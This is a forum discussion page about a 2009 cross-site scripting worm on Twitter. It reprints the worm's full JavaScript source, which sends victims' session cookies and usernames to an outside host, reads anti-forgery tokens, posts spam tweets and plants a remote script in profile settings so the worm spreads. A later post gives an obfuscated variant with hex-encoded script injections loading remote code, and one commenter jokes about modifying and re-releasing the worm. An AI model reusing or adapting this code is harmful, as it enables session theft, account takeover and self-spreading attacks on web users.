| |
|
This page contains all of the posts and discussion on MemeStreams referencing the following web page: Another Ajax powered XSS worm. You can find discussions on MemeStreams as you surf the web, even if you aren't a MemeStreams member, using the Threads Bookmarklet.
|
Another Ajax powered XSS worm
by Acidus at 10:06 pm EDT, Apr 12, 2009 |
An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, maybe it does. ;-) Update: Source
function XHConn()
{
var xmlhttp, bComplete = false;
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
catch(z) { return false; }
return true;
};
return this;
}
function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});
return ret;
}
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
function wait()
{
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
updateEncode = urlencode(genRand);
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
|
| |
RE: Another Ajax powered XSS worm
by Rattle at 1:51 pm EDT, Apr 13, 2009 |
Acidus wrote:
An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, it does.
This is so fucking lame: var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com"; The evil side of me thinks it would be fun to patch the virus to something like this and re-release it: var randomUpdate=new Array();
randomUpdate[0]="Dude, I don't see any of these killer robots you are tweating about. What's the fuss?";
randomUpdate[1]="Join the fight against the killer robots everyone!";
randomUpdate[2]="Woooo, we've finally got killer robots! Soon maybe flying cars finally :)";
randomUpdate[3]="Virus!? What? This isn't a bunch of infected vacuum cleaners we are talking about here.. THESE ARE KILLER ROBOTS FROM OUTER SPACE!";
randomUpdate[4]="Wow...I just watched a killer robot eat my mailman..";
randomUpdate[5]="@twitter It's all your fault, the killer robots use twitter to communicate!"; |
|
| |
RE: Another Ajax powered XSS worm
by Worthersee at 3:01 pm EDT, Apr 13, 2009 |
Cute obfuscation
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
function XHConn(){
var _0x6687x2,_0x6687x3=false;
try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
catch(e) { _0x6687x2=false; }; }; };
if (!_0x6687x2) { return null; } ;
this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
if (!_0x6687x2) { return false; };
_0x6687x3=false;
_0x6687x5=_0x6687x5[_0xc26a[0x3]]();
try {
if(_0x6687x5==_0xc26a[0x4]) {
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4+_0xc26a[0x5]+_0x6687x6,true);
_0x6687x6=_0xc26a[0x7];
} else {
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4,true);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0x8],_0xc26a[0x9]+_0x6687x4+_0xc26a[0xa]);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0xc],_0xc26a[0xd]);
} ;
_0x6687x2[_0xc26a[0xe]]=function () {
if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
_0x6687x3=true;
_0x6687x7(_0x6687x2);
} ;
... [ Read More (0.4k in body) ] |
|
|
|
